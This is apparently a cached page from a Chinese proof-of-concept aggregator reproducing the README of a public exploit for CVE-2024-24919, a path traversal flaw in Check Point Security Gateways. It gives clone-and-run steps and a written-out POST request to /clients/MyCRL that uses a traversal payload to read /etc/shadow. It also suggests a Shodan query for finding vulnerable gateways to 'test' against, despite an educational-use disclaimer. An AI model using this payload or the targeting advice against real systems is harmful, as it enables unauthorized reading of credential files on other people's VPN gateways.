Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-24919 PoC — Check Point Security Gateways 安全漏洞

Source
https://github.com/Rug4lo/CVE-2024-24919-Exploit
Associated Vulnerability
Title:Check Point Security Gateways 安全漏洞 (CVE-2024-24919)
Description:Check Point Security Gateways是以色列Check Point公司的一个人工智能驱动的 NGFW 安全网关。 Check Point Security Gateways 存在安全漏洞。攻击者利用该漏洞可以获取敏感信息。
Description
 CVE-2024-24919 Exploit and PoC - Critical LFI for Remote Access VPN or Mobile Access.
Readme
# CVE-2024-24919-Exploit

## Overview

This repository contains a python exploit for the CVE-2024-24919, a vulnerability that allows you to read sensitive files from the vulnerable page.

This exploit first checks if the target is vulnerable, and then gets the path you specify.

**Severity**: Critical

## Usage

First clone the repository:

    git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
    cd CVE-2024-24919-Exploit

Give privileges and execute the exploit with python3

    chmod +x exploit.py
    python3 exploit.py

Then follow the steps and you will get the data of the file you specify


If you are strugling make sure the URL you specify is the main one

✓ `https://google.com`

✘ `https://google.com/search?client=firefox`

## POC (Proof Of Concept)

First we need to make sure that the website have Check Point Security Gateways which have remote access VPN or mobile access software enabled.

In this exploit we are pointing to the `{ip}/clients/MyCRL` endpoint.

This endpoint is vulnerable if we do a POST petition, we add the string `CSHELL/` and the path of the file we want to read using a Path Traversal.

The request will be something like this:

    POST /clients/MyCRL HTTP/1.1
    Host: <redacted>
    Content-Length: 39

    aCSHELL/../../../../../../../etc/shadow

We get all of this looking the source code

For more information about the process check this post --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/

## Test

If you want to test this vulnerability you can use Sodan to find some vulnerable websites, using this query in sodan

    Server: “Check Point SVN Foundation”

## References
https://nvd.nist.gov/vuln/detail/CVE-2024-24919
https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/
https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919

## Disclaimer
This script is for educational purposes only. Use it responsibly and only on systems you have permission to access.
File Snapshot

 [4.0K]  /data/pocs/5c5d70426f6b88f9a9e634704c9b605d4720010a
├── [3.1K]  exploit.py
└── [2.0K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.